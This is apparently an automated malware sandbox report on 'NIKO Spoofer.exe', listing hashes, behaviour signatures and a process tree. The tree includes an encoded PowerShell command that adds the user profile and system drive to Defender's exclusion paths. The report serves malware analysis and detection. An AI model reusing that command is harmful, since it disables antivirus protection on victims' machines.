Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
5s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
30/06/2023, 01:40
Static task
static1
Behavioral task
behavioral1
Sample
NIKO Spoofer.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
NIKO Spoofer.exe
Resource
win10v2004-20230621-en
General
-
Target
NIKO Spoofer.exe
-
Size
3.0MB
-
MD5
8091b6b3fe55a496eabc65b1a5bd429a
-
SHA1
48dd9b4beecacc93a5bece4841bbefd1c8b831e9
-
SHA256
5389a08526ddec44a1cd17a82806c66a4672cf37f0a2e0eaecb12b2da633ae4b
-
SHA512
65673793a3cba401f74ebafcf474e55c97504524867475ef337d7ab8831f07275f42bb25b017451ca4e35803e53f5306b29c24afafecd307d6ca1a98352777de
-
SSDEEP
24576:0Ne4yivy/fDL0olpUqm1LGQCNTruma1wHXTWjJ4wGg/3bk8+B2pAqKSh1:we4yHTooTUBEfTrumCwjiyBB6K0
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1688 NIKO Spoofer.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\NIKO Spoofer.exe NIKO Spoofer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1688 NIKO Spoofer.exe Token: SeDebugPrivilege 1988 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1944 wrote to memory of 1988 1944 NIKO Spoofer.exe 28 PID 1944 wrote to memory of 1988 1944 NIKO Spoofer.exe 28 PID 1944 wrote to memory of 1988 1944 NIKO Spoofer.exe 28 PID 1944 wrote to memory of 1988 1944 NIKO Spoofer.exe 28 PID 1944 wrote to memory of 1688 1944 NIKO Spoofer.exe 30 PID 1944 wrote to memory of 1688 1944 NIKO Spoofer.exe 30 PID 1944 wrote to memory of 1688 1944 NIKO Spoofer.exe 30 PID 1944 wrote to memory of 1688 1944 NIKO Spoofer.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\NIKO Spoofer.exe"C:\Users\Admin\AppData\Local\Temp\NIKO Spoofer.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeABjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAdgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AYwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAaQB5ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\Windows\NIKO Spoofer.exe"C:\Windows\NIKO Spoofer.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.0MB
MD511953d39d1c7601e086a0170c24e7c06
SHA1d11f9ceac9163d6888c1ec152ed8429560bbd965
SHA256ac58abcfd245da5c3b1a8301b15503c7bdc401fb80130474801b4b7ce5753d08
SHA5124e1d35aae96c5dbffe9ec9efba86545baf30fea6d8b08dabc98c270582d93669f09062173fc42f892f19fd69a6b7b1e8991bb70a6624d6a0bfce09e5eea6c797
-
Filesize
3.0MB
MD511953d39d1c7601e086a0170c24e7c06
SHA1d11f9ceac9163d6888c1ec152ed8429560bbd965
SHA256ac58abcfd245da5c3b1a8301b15503c7bdc401fb80130474801b4b7ce5753d08
SHA5124e1d35aae96c5dbffe9ec9efba86545baf30fea6d8b08dabc98c270582d93669f09062173fc42f892f19fd69a6b7b1e8991bb70a6624d6a0bfce09e5eea6c797